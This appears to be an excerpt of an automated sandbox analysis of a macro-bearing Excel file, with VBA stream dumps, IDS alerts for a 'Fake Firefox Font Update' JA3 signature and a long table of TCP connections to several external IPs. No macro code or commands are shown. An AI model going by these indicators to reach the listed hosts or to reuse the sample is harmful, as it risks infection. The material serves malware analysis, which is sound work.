                                      Data Raw:54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 53 68 65 65 74 32 00 53 00 68 00 65 00 65 00 74 00 32 00 00 00 53 68 65 65 74 33 00 53 00 68 00 65 00 65 00 74 00 33 00 00 00 00 00
                                      General
                                      Stream Path:_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
                                      CLSID:
                                      File Type:data
                                      Stream Size:2644
                                      Entropy:3.980477309748237
                                      Base64 Encoded:False
                                      Data ASCII:a . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 0 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 6 . \\ . V . B . E . 6 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F . o . r .
                                      Data Raw:cc 61 88 00 00 01 00 ff 09 40 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 04 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 30 00 23 00
                                      General
                                      Stream Path:_VBA_PROJECT_CUR/VBA/dir
                                      CLSID:
                                      File Type:data
                                      Stream Size:553
                                      Entropy:6.356512508349015
                                      Base64 Encoded:True
                                      Data ASCII:. % . . . . . . . . 0 * . . . . p . . H . . . . d . . . . . . . V B A P r o j e c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . # . i . . . . J < . . . . . r s t d o l e > . . . s . t . d . o . l . e . . . h . % . ^ . . * \\ G { 0 0 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s W O W 6 4 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . E O f f D i c E O . f . i . c E . . E . 2 D F 8 D 0 4 C . - 5 B F A - 1 0 1 B - B D E 5 E A A C 4 . 2
                                      Data Raw:01 25 b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 23 08 e6 69 08 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47
                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                      2025-03-10T09:13:39.805073+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.74970413.107.253.72443TCP
                                      2025-03-10T09:13:48.205241+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.74970613.107.253.72443TCP
                                      2025-03-10T09:13:48.227540+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.74970713.107.253.72443TCP
                                      2025-03-10T09:13:50.888269+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.74970913.107.253.72443TCP
                                      2025-03-10T09:13:50.976760+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.74970813.107.253.72443TCP
                                      TimestampSource PortDest PortSource IPDest IP
                                      Mar 10, 2025 09:13:21.652290106 CET49700443192.168.2.73.39.153.44
                                      Mar 10, 2025 09:13:21.652338028 CET443497003.39.153.44192.168.2.7
                                      Mar 10, 2025 09:13:21.652410984 CET49700443192.168.2.73.39.153.44
                                      Mar 10, 2025 09:13:21.652719021 CET49700443192.168.2.73.39.153.44
                                      Mar 10, 2025 09:13:21.652736902 CET443497003.39.153.44192.168.2.7
                                      Mar 10, 2025 09:13:24.214797020 CET443497003.39.153.44192.168.2.7
                                      Mar 10, 2025 09:13:24.214873075 CET49700443192.168.2.73.39.153.44
                                      Mar 10, 2025 09:13:24.218827963 CET49700443192.168.2.73.39.153.44
                                      Mar 10, 2025 09:13:24.218836069 CET443497003.39.153.44192.168.2.7
                                      Mar 10, 2025 09:13:24.219086885 CET443497003.39.153.44192.168.2.7
                                      Mar 10, 2025 09:13:24.219218969 CET49700443192.168.2.73.39.153.44
                                      Mar 10, 2025 09:13:24.219686031 CET49700443192.168.2.73.39.153.44
                                      Mar 10, 2025 09:13:24.260330915 CET443497003.39.153.44192.168.2.7
                                      Mar 10, 2025 09:13:24.760257959 CET443497003.39.153.44192.168.2.7
                                      Mar 10, 2025 09:13:24.760369062 CET443497003.39.153.44192.168.2.7
                                      Mar 10, 2025 09:13:24.760481119 CET49700443192.168.2.73.39.153.44
                                      Mar 10, 2025 09:13:24.761049032 CET49700443192.168.2.73.39.153.44
                                      Mar 10, 2025 09:13:24.764611006 CET49700443192.168.2.73.39.153.44
                                      Mar 10, 2025 09:13:24.764653921 CET443497003.39.153.44192.168.2.7
                                      Mar 10, 2025 09:13:24.768268108 CET4970280192.168.2.7198.23.187.151
                                      Mar 10, 2025 09:13:24.773344994 CET8049702198.23.187.151192.168.2.7
                                      Mar 10, 2025 09:13:24.773556948 CET4970280192.168.2.7198.23.187.151
                                      Mar 10, 2025 09:13:24.773556948 CET4970280192.168.2.7198.23.187.151
                                      Mar 10, 2025 09:13:24.778574944 CET8049702198.23.187.151192.168.2.7
                                      Mar 10, 2025 09:13:25.276870966 CET8049702198.23.187.151192.168.2.7
                                      Mar 10, 2025 09:13:25.276885033 CET8049702198.23.187.151192.168.2.7
                                      Mar 10, 2025 09:13:25.277031898 CET8049702198.23.187.151192.168.2.7
                                      Mar 10, 2025 09:13:25.277044058 CET8049702198.23.187.151192.168.2.7
                                      Mar 10, 2025 09:13:25.277043104 CET4970280192.168.2.7198.23.187.151
                                      Mar 10, 2025 09:13:25.277054071 CET8049702198.23.187.151192.168.2.7
                                      Mar 10, 2025 09:13:25.277062893 CET8049702198.23.187.151192.168.2.7
                                      Mar 10, 2025 09:13:25.277072906 CET8049702198.23.187.151192.168.2.7
                                      Mar 10, 2025 09:13:25.277084112 CET8049702198.23.187.151192.168.2.7
                                      Mar 10, 2025 09:13:25.277091026 CET4970280192.168.2.7198.23.187.151
                                      Mar 10, 2025 09:13:25.277093887 CET8049702198.23.187.151192.168.2.7
                                      Mar 10, 2025 09:13:25.277103901 CET8049702198.23.187.151192.168.2.7
                                      Mar 10, 2025 09:13:25.277112961 CET4970280192.168.2.7198.23.187.151
                                      Mar 10, 2025 09:13:25.277184010 CET4970280192.168.2.7198.23.187.151
                                      Mar 10, 2025 09:13:25.285687923 CET8049702198.23.187.151192.168.2.7
                                      Mar 10, 2025 09:13:25.285701036 CET8049702198.23.187.151192.168.2.7
                                      Mar 10, 2025 09:13:25.285712004 CET8049702198.23.187.151192.168.2.7
                                      Mar 10, 2025 09:13:25.285761118 CET4970280192.168.2.7198.23.187.151
                                      Mar 10, 2025 09:13:25.285878897 CET4970280192.168.2.7198.23.187.151
                                      Mar 10, 2025 09:13:25.363637924 CET8049702198.23.187.151192.168.2.7
                                      Mar 10, 2025 09:13:25.363737106 CET4970280192.168.2.7198.23.187.151
                                      Mar 10, 2025 09:13:25.532649994 CET4970280192.168.2.7198.23.187.151
                                      Mar 10, 2025 09:13:25.532819986 CET4970280192.168.2.7198.23.187.151
                                      Mar 10, 2025 09:13:37.757530928 CET49704443192.168.2.713.107.253.72
                                      Mar 10, 2025 09:13:37.757580996 CET4434970413.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:37.757654905 CET49704443192.168.2.713.107.253.72
                                      Mar 10, 2025 09:13:37.758141994 CET49704443192.168.2.713.107.253.72
                                      Mar 10, 2025 09:13:37.758162975 CET4434970413.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:39.804989100 CET4434970413.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:39.805073023 CET49704443192.168.2.713.107.253.72
                                      Mar 10, 2025 09:13:39.807946920 CET49704443192.168.2.713.107.253.72
                                      Mar 10, 2025 09:13:39.807964087 CET4434970413.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:39.808222055 CET4434970413.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:39.815634966 CET49704443192.168.2.713.107.253.72
                                      Mar 10, 2025 09:13:39.860333920 CET4434970413.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:40.295557976 CET4434970413.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:40.295583963 CET4434970413.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:40.295605898 CET4434970413.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:40.295676947 CET49704443192.168.2.713.107.253.72
                                      Mar 10, 2025 09:13:40.295691967 CET4434970413.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:40.295762062 CET49704443192.168.2.713.107.253.72
                                      Mar 10, 2025 09:13:40.295773983 CET49704443192.168.2.713.107.253.72
                                      Mar 10, 2025 09:13:40.376688957 CET4434970413.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:40.376713991 CET4434970413.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:40.376797915 CET49704443192.168.2.713.107.253.72
                                      Mar 10, 2025 09:13:40.376817942 CET4434970413.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:40.376827955 CET49704443192.168.2.713.107.253.72
                                      Mar 10, 2025 09:13:40.376986980 CET49704443192.168.2.713.107.253.72
                                      Mar 10, 2025 09:13:40.407505989 CET4434970413.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:40.407526970 CET4434970413.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:40.407761097 CET49704443192.168.2.713.107.253.72
                                      Mar 10, 2025 09:13:40.407761097 CET49704443192.168.2.713.107.253.72
                                      Mar 10, 2025 09:13:40.407773972 CET4434970413.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:40.407916069 CET49704443192.168.2.713.107.253.72
                                      Mar 10, 2025 09:13:40.453453064 CET4434970413.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:40.453476906 CET4434970413.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:40.453644037 CET49704443192.168.2.713.107.253.72
                                      Mar 10, 2025 09:13:40.453658104 CET4434970413.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:40.454387903 CET49704443192.168.2.713.107.253.72
                                      Mar 10, 2025 09:13:40.478460073 CET4434970413.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:40.478478909 CET4434970413.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:40.478583097 CET49704443192.168.2.713.107.253.72
                                      Mar 10, 2025 09:13:40.478604078 CET4434970413.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:40.478888035 CET49704443192.168.2.713.107.253.72
                                      Mar 10, 2025 09:13:40.497587919 CET4434970413.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:40.497607946 CET4434970413.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:40.497709036 CET49704443192.168.2.713.107.253.72
                                      Mar 10, 2025 09:13:40.497709036 CET49704443192.168.2.713.107.253.72
                                      Mar 10, 2025 09:13:40.497721910 CET4434970413.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:40.498105049 CET49704443192.168.2.713.107.253.72
                                      Mar 10, 2025 09:13:40.520232916 CET4434970413.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:40.520261049 CET4434970413.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:40.520332098 CET49704443192.168.2.713.107.253.72
                                      Mar 10, 2025 09:13:40.520344019 CET4434970413.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:40.520531893 CET49704443192.168.2.713.107.253.72
                                      Mar 10, 2025 09:13:40.547969103 CET4434970413.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:40.547992945 CET4434970413.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:40.548080921 CET49704443192.168.2.713.107.253.72
                                      Mar 10, 2025 09:13:40.548098087 CET4434970413.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:40.548295975 CET49704443192.168.2.713.107.253.72
                                      Mar 10, 2025 09:13:40.557076931 CET4434970413.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:40.557106972 CET4434970413.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:40.557194948 CET49704443192.168.2.713.107.253.72
                                      Mar 10, 2025 09:13:40.557210922 CET4434970413.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:40.557229042 CET49704443192.168.2.713.107.253.72
                                      Mar 10, 2025 09:13:40.557401896 CET49704443192.168.2.713.107.253.72
                                      Mar 10, 2025 09:13:40.571783066 CET4434970413.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:40.571805000 CET4434970413.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:40.571855068 CET49704443192.168.2.713.107.253.72
                                      Mar 10, 2025 09:13:40.571867943 CET4434970413.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:40.571958065 CET49704443192.168.2.713.107.253.72
                                      Mar 10, 2025 09:13:40.583324909 CET4434970413.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:40.583345890 CET4434970413.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:40.583494902 CET49704443192.168.2.713.107.253.72
                                      Mar 10, 2025 09:13:40.583504915 CET4434970413.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:40.583679914 CET49704443192.168.2.713.107.253.72
                                      Mar 10, 2025 09:13:40.594769001 CET4434970413.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:40.594786882 CET4434970413.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:40.594857931 CET49704443192.168.2.713.107.253.72
                                      Mar 10, 2025 09:13:40.594870090 CET4434970413.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:40.595073938 CET49704443192.168.2.713.107.253.72
                                      Mar 10, 2025 09:13:40.619579077 CET4434970413.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:40.619602919 CET4434970413.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:40.619671106 CET49704443192.168.2.713.107.253.72
                                      Mar 10, 2025 09:13:40.619684935 CET4434970413.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:40.619728088 CET49704443192.168.2.713.107.253.72
                                      Mar 10, 2025 09:13:40.619728088 CET49704443192.168.2.713.107.253.72
                                      Mar 10, 2025 09:13:40.627692938 CET4434970413.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:40.627711058 CET4434970413.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:40.627780914 CET49704443192.168.2.713.107.253.72
                                      Mar 10, 2025 09:13:40.627799988 CET4434970413.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:40.627819061 CET49704443192.168.2.713.107.253.72
                                      Mar 10, 2025 09:13:40.627898932 CET49704443192.168.2.713.107.253.72
                                      Mar 10, 2025 09:13:40.674654007 CET4434970413.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:40.674679995 CET4434970413.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:40.674783945 CET49704443192.168.2.713.107.253.72
                                      Mar 10, 2025 09:13:40.674798965 CET4434970413.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:40.674890041 CET49704443192.168.2.713.107.253.72
                                      Mar 10, 2025 09:13:40.681307077 CET4434970413.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:40.681324959 CET4434970413.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:40.681431055 CET49704443192.168.2.713.107.253.72
                                      Mar 10, 2025 09:13:40.681442976 CET4434970413.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:40.681730986 CET49704443192.168.2.713.107.253.72
                                      Mar 10, 2025 09:13:40.704641104 CET4434970413.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:40.704667091 CET4434970413.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:40.704736948 CET49704443192.168.2.713.107.253.72
                                      Mar 10, 2025 09:13:40.704749107 CET4434970413.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:40.704850912 CET49704443192.168.2.713.107.253.72
                                      Mar 10, 2025 09:13:40.704850912 CET49704443192.168.2.713.107.253.72
                                      Mar 10, 2025 09:13:40.710639000 CET4434970413.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:40.710665941 CET4434970413.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:40.710767984 CET49704443192.168.2.713.107.253.72
                                      Mar 10, 2025 09:13:40.710779905 CET4434970413.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:40.710947990 CET49704443192.168.2.713.107.253.72
                                      Mar 10, 2025 09:13:40.715128899 CET4434970413.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:40.715153933 CET4434970413.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:40.715248108 CET49704443192.168.2.713.107.253.72
                                      Mar 10, 2025 09:13:40.715248108 CET49704443192.168.2.713.107.253.72
                                      Mar 10, 2025 09:13:40.715265989 CET4434970413.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:40.715346098 CET49704443192.168.2.713.107.253.72
                                      Mar 10, 2025 09:13:40.720730066 CET4434970413.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:40.720746994 CET4434970413.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:40.720804930 CET49704443192.168.2.713.107.253.72
                                      Mar 10, 2025 09:13:40.720815897 CET4434970413.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:40.720877886 CET49704443192.168.2.713.107.253.72
                                      Mar 10, 2025 09:13:40.720877886 CET49704443192.168.2.713.107.253.72
                                      Mar 10, 2025 09:13:40.731762886 CET4434970413.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:40.731791019 CET4434970413.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:40.731863022 CET4434970413.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:40.731899977 CET49704443192.168.2.713.107.253.72
                                      Mar 10, 2025 09:13:40.731899977 CET49704443192.168.2.713.107.253.72
                                      Mar 10, 2025 09:13:40.731918097 CET4434970413.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:40.732003927 CET49704443192.168.2.713.107.253.72
                                      Mar 10, 2025 09:13:40.768066883 CET4434970413.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:40.768093109 CET4434970413.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:40.768197060 CET49704443192.168.2.713.107.253.72
                                      Mar 10, 2025 09:13:40.768197060 CET49704443192.168.2.713.107.253.72
                                      Mar 10, 2025 09:13:40.768213034 CET4434970413.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:40.773155928 CET4434970413.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:40.773179054 CET4434970413.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:40.773252964 CET49704443192.168.2.713.107.253.72
                                      Mar 10, 2025 09:13:40.773252964 CET49704443192.168.2.713.107.253.72
                                      Mar 10, 2025 09:13:40.773276091 CET4434970413.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:40.794634104 CET4434970413.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:40.794651985 CET4434970413.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:40.794821024 CET49704443192.168.2.713.107.253.72
                                      Mar 10, 2025 09:13:40.794842958 CET4434970413.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:40.798559904 CET4434970413.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:40.798582077 CET4434970413.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:40.798676968 CET49704443192.168.2.713.107.253.72
                                      Mar 10, 2025 09:13:40.798676968 CET49704443192.168.2.713.107.253.72
                                      Mar 10, 2025 09:13:40.798693895 CET4434970413.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:40.805619001 CET4434970413.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:40.805644035 CET4434970413.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:40.805733919 CET49704443192.168.2.713.107.253.72
                                      Mar 10, 2025 09:13:40.805742979 CET4434970413.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:40.811491966 CET4434970413.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:40.811517000 CET4434970413.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:40.811562061 CET49704443192.168.2.713.107.253.72
                                      Mar 10, 2025 09:13:40.811572075 CET4434970413.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:40.811609030 CET49704443192.168.2.713.107.253.72
                                      Mar 10, 2025 09:13:40.815393925 CET4434970413.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:40.815409899 CET4434970413.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:40.815507889 CET49704443192.168.2.713.107.253.72
                                      Mar 10, 2025 09:13:40.815507889 CET49704443192.168.2.713.107.253.72
                                      Mar 10, 2025 09:13:40.815519094 CET4434970413.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:40.820705891 CET4434970413.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:40.820724964 CET4434970413.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:40.820782900 CET49704443192.168.2.713.107.253.72
                                      Mar 10, 2025 09:13:40.820801020 CET4434970413.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:40.820811987 CET49704443192.168.2.713.107.253.72
                                      Mar 10, 2025 09:13:40.860872030 CET4434970413.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:40.860894918 CET4434970413.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:40.860958099 CET49704443192.168.2.713.107.253.72
                                      Mar 10, 2025 09:13:40.860980988 CET4434970413.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:40.861021042 CET49704443192.168.2.713.107.253.72
                                      Mar 10, 2025 09:13:40.866117954 CET4434970413.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:40.866137981 CET4434970413.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:40.866255999 CET49704443192.168.2.713.107.253.72
                                      Mar 10, 2025 09:13:40.866255999 CET49704443192.168.2.713.107.253.72
                                      Mar 10, 2025 09:13:40.866276026 CET4434970413.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:40.888190985 CET4434970413.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:40.888216019 CET4434970413.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:40.888276100 CET49704443192.168.2.713.107.253.72
                                      Mar 10, 2025 09:13:40.888290882 CET4434970413.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:40.888322115 CET49704443192.168.2.713.107.253.72
                                      Mar 10, 2025 09:13:40.892662048 CET4434970413.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:40.892680883 CET4434970413.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:40.892952919 CET49704443192.168.2.713.107.253.72
                                      Mar 10, 2025 09:13:40.892952919 CET49704443192.168.2.713.107.253.72
                                      Mar 10, 2025 09:13:40.892965078 CET4434970413.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:40.898699999 CET4434970413.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:40.898720026 CET4434970413.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:40.898844957 CET49704443192.168.2.713.107.253.72
                                      Mar 10, 2025 09:13:40.898858070 CET4434970413.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:40.904045105 CET4434970413.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:40.904067039 CET4434970413.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:40.904141903 CET49704443192.168.2.713.107.253.72
                                      Mar 10, 2025 09:13:40.904155970 CET4434970413.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:40.904192924 CET49704443192.168.2.713.107.253.72
                                      Mar 10, 2025 09:13:40.909398079 CET4434970413.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:40.909415960 CET4434970413.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:40.909560919 CET49704443192.168.2.713.107.253.72
                                      Mar 10, 2025 09:13:40.909576893 CET4434970413.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:40.914511919 CET4434970413.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:40.914530039 CET4434970413.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:40.914630890 CET49704443192.168.2.713.107.253.72
                                      Mar 10, 2025 09:13:40.914649963 CET4434970413.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:40.956219912 CET4434970413.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:40.956240892 CET4434970413.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:40.956324100 CET49704443192.168.2.713.107.253.72
                                      Mar 10, 2025 09:13:40.956340075 CET4434970413.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:40.956350088 CET49704443192.168.2.713.107.253.72
                                      Mar 10, 2025 09:13:40.960223913 CET4434970413.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:40.960242987 CET4434970413.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:40.960323095 CET49704443192.168.2.713.107.253.72
                                      Mar 10, 2025 09:13:40.960345030 CET4434970413.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:40.960365057 CET49704443192.168.2.713.107.253.72
                                      Mar 10, 2025 09:13:40.985172033 CET4434970413.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:40.985189915 CET4434970413.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:40.985449076 CET49704443192.168.2.713.107.253.72
                                      Mar 10, 2025 09:13:40.985467911 CET4434970413.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:40.988100052 CET4434970413.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:40.988126993 CET4434970413.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:40.988245010 CET49704443192.168.2.713.107.253.72
                                      Mar 10, 2025 09:13:40.988245010 CET49704443192.168.2.713.107.253.72
                                      Mar 10, 2025 09:13:40.988260984 CET4434970413.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:40.992634058 CET4434970413.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:40.992649078 CET4434970413.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:40.992727041 CET49704443192.168.2.713.107.253.72
                                      Mar 10, 2025 09:13:40.992746115 CET4434970413.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:41.000762939 CET4434970413.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:41.000782013 CET4434970413.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:41.000819921 CET49704443192.168.2.713.107.253.72
                                      Mar 10, 2025 09:13:41.000832081 CET4434970413.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:41.000880003 CET49704443192.168.2.713.107.253.72
                                      Mar 10, 2025 09:13:41.006453037 CET4434970413.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:41.006468058 CET4434970413.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:41.006572962 CET49704443192.168.2.713.107.253.72
                                      Mar 10, 2025 09:13:41.006584883 CET4434970413.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:41.011718988 CET4434970413.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:41.011745930 CET4434970413.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:41.011795044 CET49704443192.168.2.713.107.253.72
                                      Mar 10, 2025 09:13:41.011806965 CET4434970413.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:41.011832952 CET49704443192.168.2.713.107.253.72
                                      Mar 10, 2025 09:13:41.051862001 CET4434970413.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:41.051882982 CET4434970413.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:41.051944971 CET49704443192.168.2.713.107.253.72
                                      Mar 10, 2025 09:13:41.051959991 CET4434970413.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:41.051992893 CET49704443192.168.2.713.107.253.72
                                      Mar 10, 2025 09:13:41.060172081 CET4434970413.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:41.060193062 CET4434970413.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:41.060276031 CET49704443192.168.2.713.107.253.72
                                      Mar 10, 2025 09:13:41.060291052 CET4434970413.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:41.079668045 CET4434970413.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:41.079684973 CET4434970413.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:41.079750061 CET49704443192.168.2.713.107.253.72
                                      Mar 10, 2025 09:13:41.079766035 CET4434970413.107.253.72192.168.2.7
